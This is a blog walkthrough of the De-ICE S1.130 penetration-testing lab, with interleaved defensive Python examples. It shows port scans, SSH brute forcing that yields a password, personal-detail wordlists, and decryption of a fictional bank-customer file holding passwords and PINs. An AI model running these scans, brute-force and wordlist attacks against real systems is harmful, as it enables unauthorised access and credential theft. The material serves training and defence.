While digging through an old external drive I found the De-ICE LiveCDs and the walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. This one was short and sweet, not too many flags to deal with. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
De-ICE S1.130
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.130.iso
Default IP: Not so fast buddy, that is one of the flags
Flags:
1. Find default IP for system
2. Obtain access to the file system
3. Final Flag: Obtain the new user accounts' bank information
Spoilers and Walkthrough
Port scan the image to get started. At this point I was having everyone do this through the Metasploit console instead of standalone nmap.
msfconsole
workspace deice
db_nmap -sS -F -T4 --exclude 192.168.1.128 192.168.1.0/24
You will need to exclude your own IP, 192.168.1.128 is mine. If you are running any other known systems on your network add them to the exclude with a comma to separate the list.
msf > hosts

Hosts
=====

address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.1.1    00:50:56:c0:00:08        Unknown                    device
192.168.1.2    00:50:56:e6:1d:4b        Unknown                    device
192.168.1.20   00:0c:29:a4:37:1e        Unknown                    device
192.168.1.123  00:0c:29:a4:37:1e  slax  Linux    2.6.X             server
.1 and .2 are the VMWare NAT. You can check those but trust me. .123 is a different De-ICE LiveCD that is included in the same database because I’m lazy. Looks like 192.168.1.20 is the one.
netdiscover is another tool that looks for ARP requests to discover live hosts. While it isn’t integrated into metasploit I’ve used it on penetration tests to locate hosts for zero knowledge internal tests.
netdiscover

 Currently scanning: 192.168.66.0/16   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.1     00:50:56:c0:00:08      1      60  Unknown vendor
 192.168.1.2     00:50:56:e7:84:3f      1      60  Unknown vendor
 192.168.1.20    00:0c:29:1f:c6:f0      1      60  Unknown vendor
 192.168.1.254   00:50:56:f9:37:34      1      60  Unknown vendor
The -sV and -O combination is the same as -A, but I've separated it out just to have this line of text to tell you that. When I originally did these walkthroughs the notes became progressively less detailed, since the small group was getting better each week. Since these are now standalone I will add a little more detail, hence the time mismatch.
msf > db_nmap -sV -O -F 192.168.1.20
[*] Nmap: Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-06 00:08 EDT
[*] Nmap: Nmap scan report for 192.168.1.20
[*] Nmap: Host is up (0.00058s latency).
[*] Nmap: Not shown: 93 filtered ports
[*] Nmap: PORT    STATE  SERVICE VERSION
[*] Nmap: 21/tcp  open   ftp     vsftpd 2.0.4
[*] Nmap: 22/tcp  open   ssh     OpenSSH 4.3 (protocol 1.99)
[*] Nmap: 25/tcp  open   smtp    Sendmail 8.13.7/8.13.7
[*] Nmap: 80/tcp  open   http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
[*] Nmap: 110/tcp open   pop3    Openwall popa3d
[*] Nmap: 143/tcp open   imap    UW imapd 2004.357
[*] Nmap: 443/tcp closed https
[*] Nmap: MAC Address: 00:0C:29:1F:C6:F0 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.13 - 2.6.32
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: slax.example.net; OS: Unix
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.03 seconds
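Reading a service scan like the one above by eye works for one host, but on a real engagement (or on the blue-team side, reviewing what a scanner found on your own network) you want the banners turned into a list of findings. The following is an added example, not part of the original walkthrough or the De-ICE image: it parses the `[*] Nmap:` lines that db_nmap prints inside msfconsole and applies a few assumed triage rules, such as flagging an SSH daemon that reports protocol 1.99 (meaning it still falls back to SSH-1 for old clients) and services that carry logins in cleartext. The sample input mirrors the scan of 192.168.1.20 shown above; the rule set and the function names are my own.

```python
import re

# Sample input: the "[*] Nmap: ..." lines db_nmap prints inside msfconsole,
# mirroring the service scan of 192.168.1.20 shown in the walkthrough above.
SAMPLE_DB_NMAP = """\
[*] Nmap: Nmap scan report for 192.168.1.20
[*] Nmap: Host is up (0.00058s latency).
[*] Nmap: Not shown: 93 filtered ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.0.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
[*] Nmap: 25/tcp open smtp Sendmail 8.13.7/8.13.7
[*] Nmap: 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
[*] Nmap: 110/tcp open pop3 Openwall popa3d
[*] Nmap: 143/tcp open imap UW imapd 2004.357
[*] Nmap: 443/tcp closed https
[*] Nmap: MAC Address: 00:0C:29:1F:C6:F0 (VMware)
"""

HOST_RE = re.compile(r"^\[\*\] Nmap: Nmap scan report for (?P<host>\S+)")
PORT_RE = re.compile(
    r"^\[\*\] Nmap: (?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

# Assumed rule: these services carry logins in cleartext unless TLS/STARTTLS is enforced.
CLEARTEXT_SERVICES = {"ftp", "http", "pop3", "imap"}


def parse_db_nmap(text):
    """Return {host: [service records]} from db_nmap console output."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m["host"]
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            hosts[current].append({
                "port": int(m["port"]),
                "proto": m["proto"],
                "state": m["state"],
                "service": m["service"],
                "version": m["version"] or "",
            })
    return hosts


def triage(services):
    """Apply simple hardening rules to one host's open services; returns (port, finding) pairs."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        port, svc, ver = s["port"], s["service"], s["version"]
        if svc == "ssh" and "protocol 1.99" in ver:
            # 1.99 means the daemon speaks SSH-2 but still negotiates SSH-1 with old clients.
            findings.append((port, "SSH advertises protocol 1.99: SSHv1 fallback is enabled"))
        if svc in CLEARTEXT_SERVICES:
            findings.append((port, f"{svc} carries credentials in cleartext"))
        if ver:
            findings.append((port, f"banner discloses software version: {ver}"))
    return findings


if __name__ == "__main__":
    for host, services in parse_db_nmap(SAMPLE_DB_NMAP).items():
        print(host)
        for port, finding in triage(services):
            print(f"  {port}  {finding}")
```

The closed 443 port is parsed but produces no finding; on the sample above the rules yield eleven findings across the six open ports, which is the kind of list that feeds straight into the report's vulnerability section.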
In a normal penetration test, if this was the only host in scope, I would dig through the FTP and HTTP sites for data in parallel to performing vulnerability identification. We have used the Nikto web vulnerability scanner in the past and will use it again for this test. Nikto uses a custom User Agent string Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID). This can be changed in the /etc/nikto.conf file or the scan can be piped through the Burp proxy and used to change the User Agent. Most network security appliances and hardened web servers will not give good results to Nikto scans since it is known bad traffic.
nikto -h 192.168.1.20
http://192.168.1.20/info.php has good info. The /info.php page is good on any test and will usually be a finding in the penetration test report.
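The User-Agent string mentioned above is also the easiest way for the defending side to spot a Nikto run in the web server logs, and the /info.php exposure is worth an alert in its own right because it dumps the PHP configuration to whoever asks. As an added example (not code from the original walkthrough), this parses Apache combined-format access log lines, counts requests per source IP that carry Nikto's `(Nikto/...)` marker, and records every successful hit on a configuration-disclosure page. The log lines are constructed for the example; the sensitive-path list and function names are assumptions.

```python
import re
from collections import Counter

# Constructed sample lines in Apache "combined" log format (not taken from the page).
# The first three carry Nikto's default User-Agent pattern; the last two are ordinary clients.
SAMPLE_ACCESS_LOG = """\
192.168.1.128 - - [06/Apr/2017:00:12:01 -0400] "GET / HTTP/1.1" 200 1432 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
192.168.1.128 - - [06/Apr/2017:00:12:01 -0400] "GET /info.php HTTP/1.1" 200 54120 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:003300)"
192.168.1.128 - - [06/Apr/2017:00:12:02 -0400] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000412)"
10.0.0.7 - - [06/Apr/2017:00:13:10 -0400] "GET /index.html HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/52.0"
10.0.0.9 - - [06/Apr/2017:00:14:33 -0400] "GET /info.php HTTP/1.1" 200 54120 "-" "curl/7.52.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Nikto's stock template is Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID)
NIKTO_UA_RE = re.compile(r"\(Nikto/[^)]*\)")
# Assumed list of pages that dump server configuration; a 200 on them is a finding
# regardless of who asked for it.
SENSITIVE_PATHS = {"/info.php", "/phpinfo.php"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Return Nikto request counts per source IP and every successful hit on a sensitive page."""
    nikto_hits = Counter()
    sensitive_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if NIKTO_UA_RE.search(rec["ua"]):
            nikto_hits[rec["ip"]] += 1
        if rec["path"] in SENSITIVE_PATHS and rec["status"] == "200":
            sensitive_hits.append((rec["ip"], rec["path"], rec["ua"]))
    return {"nikto_scanners": dict(nikto_hits), "sensitive_hits": sensitive_hits}


if __name__ == "__main__":
    result = detect(SAMPLE_ACCESS_LOG)
    for ip, n in result["nikto_scanners"].items():
        print(f"Nikto User-Agent from {ip}: {n} requests")
    for ip, path, ua in result["sensitive_hits"]:
        print(f"{ip} fetched {path} with {ua!r}")
```

Because the User-Agent is trivially changed (the post itself notes the nikto.conf and Burp options), the UA match is a low-cost but low-confidence signal; pair it with a request-rate or 404-burst rule from the same parser. The sensitive-path rule is the more durable one, since it fires on the exposure rather than on the scanner.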
Logging into the FTP site as anonymous throws an error so no viable path there.
Connected to 192.168.1.20.
220 (vsFTPd 2.0.4)
Name (192.168.1.20:root): anonymous
230 Login successful.
ftp> ls
215 UNIX Type: L8
500 OOPS: vsf_sysutil_recv_peek
In parallel, start a password attack on SSH using rockyou and root. See the S1.100 tutorial for info on how to set it up. While the brute force attack runs, let's look at some other low hanging fruit.
Let's start by looking at the SMTP server.
use auxiliary/scanner/smtp/smtp_enum
The SMTP server pops back some good info, so let's follow that rabbit hole down. We have one possible username from the website (customerserviceadmin@nosecbank.com). Let's build out a list for potential attacks.
customerserviceadmin
customeradmin
csadmin
adm
bin
daemon
dbadmin
ftp
gdm
operator
postmaster
sysadmin
webmaster
After some time passes you should get a password back. I used xHydra to show the GUI interface, but any password cracking tool will work.
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.1.20:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.20:22
[22][ssh] host: 192.168.1.20   login: csadmin   password: rocker
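A wordlist attack like the one above is loud from the server's point of view: sshd logs one "Failed password" line per guess, and the line that matters most is the "Accepted password" that follows the burst. As an added example (my own code, not part of the original walkthrough), this reads syslog-format sshd lines, keeps a five-minute sliding window of failures per source address, raises a brute-force alert when the window reaches a threshold, and raises a higher-priority alert when a login succeeds from a source that is still inside such a burst. The log lines are constructed; the window, threshold and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd lines in syslog format (not from the page): a burst of failures from one
# source followed by a success, then a single failure from another source followed by a
# success six minutes later, which falls outside the window and should not alert.
SAMPLE_AUTH_LOG = """\
Apr  6 00:20:01 slax sshd[2231]: Failed password for invalid user sysadmin from 192.168.1.128 port 40122 ssh2
Apr  6 00:20:01 slax sshd[2233]: Failed password for root from 192.168.1.128 port 40123 ssh2
Apr  6 00:20:02 slax sshd[2235]: Failed password for csadmin from 192.168.1.128 port 40124 ssh2
Apr  6 00:20:02 slax sshd[2237]: Failed password for csadmin from 192.168.1.128 port 40125 ssh2
Apr  6 00:20:03 slax sshd[2239]: Failed password for csadmin from 192.168.1.128 port 40126 ssh2
Apr  6 00:20:03 slax sshd[2241]: Failed password for csadmin from 192.168.1.128 port 40127 ssh2
Apr  6 00:20:04 slax sshd[2243]: Accepted password for csadmin from 192.168.1.128 port 40128 ssh2
Apr  6 00:25:00 slax sshd[2300]: Failed password for csadmin from 10.0.0.5 port 51000 ssh2
Apr  6 00:31:00 slax sshd[2310]: Accepted password for csadmin from 10.0.0.5 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

WINDOW = timedelta(minutes=5)   # sliding window for counting failures per source (assumed)
THRESHOLD = 5                   # failures inside the window that count as a brute force (assumed)


def parse(line, year=2017):
    """Parse one sshd line; syslog timestamps carry no year, so the caller supplies it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text):
    """Return alerts as dicts with kind, ip, user and timestamp."""
    recent = defaultdict(deque)      # source ip -> timestamps of failures inside WINDOW
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        window = recent[ip]
        while window and ts - window[0] > WINDOW:
            window.popleft()         # expire failures older than the window
        if result == "Failed":
            window.append(ts)
            if len(window) == THRESHOLD:   # fire once, when the threshold is crossed
                alerts.append({"kind": "bruteforce", "ip": ip, "user": user, "at": ts})
        elif len(window) >= THRESHOLD:
            # A login that succeeds right after a burst of failures is the case worth paging on.
            alerts.append({"kind": "success_after_bruteforce", "ip": ip, "user": user, "at": ts})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{a['at']}  {a['kind']:24}  {a['ip']}  user={a['user']}")
```

Counting per source rather than per account is what catches the pattern shown above, where the tool cycles through several usernames from one address; the expiry loop is what keeps a lone typo followed by a correct login minutes later from paging anyone.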
SSH to the server using ssh csadmin@192.168.1.20 and rifle through the file system.
csadmin@192.168.1.20's password:
Linux 2.6.16.
csadmin@slax:~$ ls
mailserv_download/
csadmin@slax:~$ cd mailserv_download/
csadmin@slax:~/mailserv_download$ ls
2010122014234.j12Gqo4H049241  2010122216451.f81Ltw4R010211.part2
Multiple file names, and one of them is a .part2; better figure that out next. Maybe I can just read the text part with cat.
csadmin@slax:~/mailserv_download$ cat *
To: csadmin@nosecbank.com
CC:
Subject: My Son's Birthday
Date: Mon, 20 Dec 2010 14:23:46 +0500
Return-Path: <sdadmin@nosecbank.com>
Delivered-To: csadmin:nosecbank.com@nosecbank.com
Received: (qmail 20281 invoked from network); 20 Dec 2010 09:23:46 -0000
X-Received: from network (192.168.1.123) by mailserv1-3.us6.service.com; 20 Dec 2010 09:23:46 -0000
Received: from www.nosecbank.com (unknown [198.65.139.34]) by srv5.us6.service.com (Postfix) with ESMTP id D98402459DD for <csadmin@nosecbank.com>; Mon, 20 Dec 2010 09:23:46 +0000 (GMT)
Message-Id: <2010122014234.j12Gqo4H049241@www.nosecbank.com>
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="---=_NextPart_000_0000_02F24S11.FEPQRE80"
X-Mailer: K-Mail; Build 1.0.5510
Thread-Index: Qw2cWVmE3odZs3TqTTqFvS1e3lexms==

Message:
Hey Mark, I am curious if you would be free to come over and visit for my son Donovin's birthday tomorrow after work. I would also appreciate if you brought Andy with you as well, because Donny really enjoyed playing with him last time he was over. I know its short notice but he is turning 12 and it is special for both him and me. Let me know if this works. Thanks!
-Paul

///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
Let's build a second attack based on the content of that email.
Username: sdadmin
Passwords:
donovin
Donovin
donovin21
Donovin21
donovin98
Donovin98
donovin1221
Donovin1221
donovin122198
Donovin122198
donovin12211998
Donovin12211998
donovin211998
Donovin211998
donovin1998
Donovin1998
Second verse same as the first. From checking the home folder you know that Fred is the databaser. As a life pro tip, don’t trust people like Fred.
Username: dbadmin
Passwords:
databaser Databaser databaser1 databaser2 databaser3 databaser4 databaser5 databaser6 databaser7 databaser8 databaser9 databaser0 databaser! databaser@ databaser# databaser$ databaser% databaser^ databaser& databaser* databaser( databaser) Databaser1 Databaser2 Databaser3 Databaser4 Databaser5 Databaser6 Databaser7 Databaser8 Databaser9 Databaser0 Databaser! Databaser@ Databaser# Databaser$ Databaser% Databaser^ Databaser& Databaser* Databaser( Databaser) databaser10 databaser11 databaser12 databaser13 databaser14 databaser15 databaser16 databaser17 databaser18 databaser19 databaser20 databaser21 databaser22 databaser23 databaser24 databaser25 databaser26 databaser27 databaser28 databaser29 databaser30 databaser31 databaser32 databaser33 databaser34 databaser35 databaser36 databaser37 databaser38 databaser39 databaser40 databaser41 databaser42 databaser43 databaser44 databaser45 databaser46 databaser47 databaser48 databaser49 databaser50 databaser51 databaser52 databaser53 databaser54 databaser55 databaser56 databaser57 databaser58 databaser59 databaser60 databaser61 databaser62 databaser63 databaser64 databaser65 databaser66 databaser67 databaser68 databaser69 databaser70 databaser71 databaser72 databaser73 databaser74 databaser75 databaser76 databaser77 databaser78 databaser79 databaser80 databaser81 databaser82 databaser83 databaser84 databaser85 databaser86 databaser87 databaser88 databaser89 databaser90 databaser91 databaser92 databaser93 databaser94 databaser95 databaser96 databaser97 databaser98 databaser99 Databaser10 Databaser11 Databaser12 Databaser13 Databaser14 Databaser15 Databaser16 Databaser17 Databaser18 Databaser19 Databaser20 Databaser21 Databaser22 Databaser23 Databaser24 Databaser25 Databaser26 Databaser27 Databaser28 Databaser29 Databaser30 Databaser31 Databaser32 Databaser33 Databaser34 Databaser35 Databaser36 Databaser37 Databaser38 Databaser39 Databaser40 Databaser41 Databaser42 Databaser43 Databaser44 Databaser45 Databaser46 Databaser47 
Databaser48 Databaser49 Databaser50 Databaser51 Databaser52 Databaser53 Databaser54 Databaser55 Databaser56 Databaser57 Databaser58 Databaser59 Databaser60 Databaser61 Databaser62 Databaser63 Databaser64 Databaser65 Databaser66 Databaser67 Databaser68 Databaser69 Databaser70 Databaser71 Databaser72 Databaser73 Databaser74 Databaser75 Databaser76 Databaser77 Databaser78 Databaser79 Databaser80 Databaser81 Databaser82 Databaser83 Databaser84 Databaser85 Databaser86 Databaser87 Databaser88 Databaser89 Databaser90 Databaser91 Databaser92 Databaser93 Databaser94 Databaser95 Databaser96 Databaser97 Databaser98 Databaser99
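The two lists above are built from exactly the pattern that a password policy should refuse: a name or job word, optionally capitalised, followed by a short digit or symbol suffix or by pieces of a memorable date. The following is an added example from the defending side (my own code, not the walkthrough's): given the personal tokens and dates known for an account, it reports whether a candidate password is such a derivative, so it can be wired into a password-change check the way zxcvbn-style checkers accept user-specific inputs. The tokens and the date come from the email quoted above (Donovin, a 21 December birthday, turning 12 in 2010); the suffix rules and thresholds are assumptions.

```python
import re
from datetime import date

# Trailing run of digits and the keyboard symbols people append to a dictionary word.
SUFFIX_RE = re.compile(r"([0-9!@#$%^&*()]*)$")

# Account profile built from the email quoted in the walkthrough (Donovin, born 21 Dec 1998).
EXAMPLE_TOKENS = ["donovin", "databaser", "fred"]
EXAMPLE_DATES = [date(1998, 12, 21)]


def date_fragments(d):
    """Digit strings people append from a memorable date: day, month, year, two-digit year."""
    return {str(d.day), f"{d.day:02d}", str(d.month), f"{d.month:02d}",
            str(d.year), f"{d.year % 100:02d}"}


def _decomposes(digits, frags):
    """True if the digit string is a concatenation of date fragments (e.g. 12+21+98)."""
    if digits == "":
        return True
    return any(digits.startswith(f) and _decomposes(digits[len(f):], frags) for f in frags)


def is_personal_derivative(password, tokens, dates=()):
    """Reject passwords of the form <known word or name> + <short or date-based suffix>.

    tokens: names, nicknames, job words known for this account (matched case-insensitively).
    dates:  birthdays or anniversaries known for this account.
    """
    suffix = SUFFIX_RE.search(password).group(1)
    stem = password[: len(password) - len(suffix)].lower()
    if stem not in {t.lower() for t in tokens}:
        return False
    digits = "".join(ch for ch in suffix if ch.isdigit())
    symbols = len(suffix) - len(digits)
    if symbols > 1:            # more than one symbol is beyond the simple-suffix pattern
        return False
    if len(digits) <= 3:       # "", "1", "99", "123": trivial to enumerate
        return True
    frags = set().union(*(date_fragments(d) for d in dates)) if dates else set()
    return _decomposes(digits, frags)


if __name__ == "__main__":
    for pw in ["Donovin1221", "databaser!", "donovin0419", "correct-horse-battery"]:
        verdict = "weak" if is_personal_derivative(pw, EXAMPLE_TOKENS, EXAMPLE_DATES) else "ok"
        print(f"{pw:24} {verdict}")
```

The date decomposition is what makes the check precise: `donovin1221` is rejected because 12+21 are the month and day on file, while `donovin0419` passes this rule because those digits are not fragments of any known date. The check only covers suffixes; date prefixes and leet substitutions would need the same idea applied after normalising the string.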
Hey look, a .part1. Let's put all that together. I had to borrow this part from another walkthrough because Java programming is not my forte. The code can be found at the bottom of this post; I named the file Decoder.java, but you can be as creative as you want.
javac Decoder.java
java Decoder sysadmin
java Decoder root
Once you find this file (useracc_update.csv.enc), try the openssl decryption similar to earlier De-ICE challenges. Hint: look in the sysadmin profile.
root@slax:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-128-cbc decryption password:
bad decrypt
25228:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-256-cbc decryption password:
bad decrypt
25311:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv -k 31/Fwxw+2
root@slax:/home/ftp/incoming# cat user
useracc_update.csv      useracc_update.csv.enc
root@slax:/home/ftp/incoming# cat useracc_update.csv
ID,Last,First,Email,State,Username,Password,Verifacation Code,Pin code
1000,Carr,Alfred,acarr23@gmail.com,NY,acarr9096,phantom4,952733,490
1001,Karson,William,wkarson53@yahoo.com,NY,wkarson2431,rockallday123,567094,345
1002,Wheeler,Cordy,megawheels98@rocketmail.com,NY,cwheeler5031,goeagles90,462724,631
1003,Smith,Ken,synthesizer_1r@gmail.com,NY,ksmith6253,crystalization,636721,353
1004,Quinn,Cynthia,qcq92@aol.com,NY,cquinn1217,archyandhenry,680247,223
1005,Floyd,Wilson,jukeboxer_4life@gmail.com,NY,wfloyd5931,knockout66,521456,441
1006,Blake,Markus,sil3nt_gunn3r@yahoo.com,NY,mblake6947,268768924,129632,557
1007,Nash,Jillian,wiselife141@aol.com,NY,jnash0934,checkitout1,324672,315
1008,Atkins,Alison,double_a44@hotmail.com,NY,aatkins9087,gogogo123123,457094,124
1009,Oliver,Frank,fog_of_war0001@gmail.com,NY,foliver9385,falconpunch,783143,134
1010,Jones,Edith,msjones677@hotmail.com,NY,ejones7532,chris12345,632620,579
1011,Moore,Cody,aiprojectx@gmail.com,NY,dot_Cipher,crypTrace,101010,1337
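The "bad decrypt" lines above are worth understanding rather than just retrying: `openssl enc` writes a `Salted__` header plus an 8-byte salt, derives the AES key and IV from the password with the legacy EVP_BytesToKey construction (a single MD5 pass in the OpenSSL 1.0-era build this image uses; OpenSSL 1.1.0 switched the default digest to SHA-256, and 1.1.1 added `-pbkdf2` and `-iter` for a real KDF), and the error is simply the PKCS#7 padding check on the last block failing because a wrong password gives a wrong key. The following is an added example, not part of the walkthrough or the De-ICE image: it reproduces the header parsing, the key/IV derivation and the padding check using only the standard library, so the AES step itself is left to whichever cipher library you pair it with. The sample file bytes and the function names are constructed for the example.

```python
import hashlib

MAGIC = b"Salted__"   # 8-byte marker that `openssl enc` writes before the salt


def evp_bytes_to_key(password, salt, key_len=32, iv_len=16, md="md5"):
    """OpenSSL's legacy EVP_BytesToKey with count=1.

    D_1 = H(password || salt), D_i = H(D_{i-1} || password || salt),
    key || iv = D_1 || D_2 || ... truncated to key_len + iv_len bytes.
    """
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        prev = hashlib.new(md, prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]


def parse_salted(blob):
    """Split an `openssl enc` output file into its 8-byte salt and the ciphertext."""
    if len(blob) < 16 or blob[:8] != MAGIC:
        raise ValueError("not an openssl enc file: missing Salted__ header")
    return blob[8:16], blob[16:]


def pkcs7_unpad(plaintext, block_size=16):
    """The check behind 'bad decrypt': with the wrong key the last block decrypts to noise,
    and its final byte almost never describes a valid padding run."""
    if not plaintext or len(plaintext) % block_size:
        raise ValueError("bad decrypt")
    n = plaintext[-1]
    if not 1 <= n <= block_size or plaintext[-n:] != bytes([n]) * n:
        raise ValueError("bad decrypt")
    return plaintext[:-n]


def key_material_for(blob, password, md="md5"):
    """Everything an AES-256-CBC decrypt of an `openssl enc` file needs: key, iv, ciphertext."""
    salt, ciphertext = parse_salted(blob)
    key, iv = evp_bytes_to_key(password, salt, 32, 16, md)
    return key, iv, ciphertext


if __name__ == "__main__":
    # Constructed file: the header, a fixed 8-byte salt and 32 bytes standing in for ciphertext.
    blob = MAGIC + bytes(range(8)) + b"\x00" * 32
    key, iv, ct = key_material_for(blob, b"example-password")
    print("salt", blob[8:16].hex())
    print("key ", key.hex())
    print("iv  ", iv.hex())
    print("unpadded:", pkcs7_unpad(b"bank,csv,rows" + b"\x03" * 3))
```

Two practical consequences follow from the derivation. First, the salt only defends against precomputation; with one MD5 per guess, a file protected this way is no harder to attack offline than the password itself, which is why a file of bank records should have been encrypted with a proper KDF (`-pbkdf2 -iter` on current OpenSSL) or with a random key rather than a typed password. Second, the padding check accepts a wrong key about one time in 256 on the last byte alone, so a decrypt that "succeeds" but yields garbage is not a contradiction; authenticated encryption (an AEAD mode) is what actually tells you the key was right.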
That is the last flag. This challenge was personally tough because of all the Java code and encryption involved, which aren't in my normal day to day penetration tests.
// Decoder.java: the public class name must match the file name for javac to accept it,
// so it is Decoder here to match the commands above. The listing is truncated in the
// original post after the start of the output loop, and processLoop() is not shown.
import java.io.*;

public class Decoder {
    public static void main(String[] args) {
        try {
            System.out.println("[*] Password Generator");
            BufferedReader in = new BufferedReader(new InputStreamReader(System.in));
            System.out.print("[?] Username: ");
            String input = in.readLine();
            int[] output = processLoop(input);
            String outputASCII = "";
            for (int i = 0; i